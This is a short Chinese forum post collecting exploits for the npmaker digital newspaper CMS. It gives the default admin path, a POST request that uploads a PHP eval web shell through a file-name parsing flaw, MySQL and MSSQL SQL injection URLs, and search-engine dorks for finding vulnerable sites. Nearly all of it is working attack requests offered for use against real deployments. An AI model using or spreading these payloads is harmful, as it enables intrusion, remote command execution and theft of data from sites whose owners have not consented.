npmaker数字报漏洞集合

2013-07-21 16:54:07 16 5503 1


npmaker数字报  

默认后台:
/www/index.php?mod=admin&con=index&act=login
win2003 getshell
/www/index.php?mod=admin&con=onepage&act=addpost
post:
onepage%5Bname%5D=phpx&onepage%5Bfilename%5D=php.php;&onepage%5Bcontent%5D=<?php eval($_POST[cmd]);?>&id=&onepage_submit=%CC%E1%BD%BB
shell地址 /shtml/php.php;.shtml

注入漏洞针对mysql数据库的
/www/index.php?mod=admin&con=deliver&act=view&username=809763517&deliId=-32 UNION SELECT 1,user(),3,4,5,6,7,8,9,10,11,12,13--
基本是root 、、

针对mssql数据库的
mssql类型

/www/index.php?mod=index&con=Review&act=getallpaper&papertype=scrb' and user>0--
跪求金币打赏、、木金币不活了、、

关键词:
inurl:www/index.php?mod=
或者
技术支持:喜阅网(www.xplus.com)
不敢说百分之百成功 但是基本还是ok的

getshell 示范记得是win2003 利用的是解析漏洞

关于作者

linke9115篇文章348篇回复

评论16次

要评论?请先  登录  或  注册